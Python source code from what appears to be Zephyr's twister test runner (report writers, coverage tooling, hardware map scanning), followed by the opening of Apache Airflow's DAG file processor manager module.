inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
elif instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.serial_baud = 115200
if serial_baud:
self.serial_baud = serial_baud
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type: pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn in to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hangs for-ever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode:
os.set_blocking(self._signal_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if conf.get('core', 'sql_alchemy_conn').startswith('sqlite') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
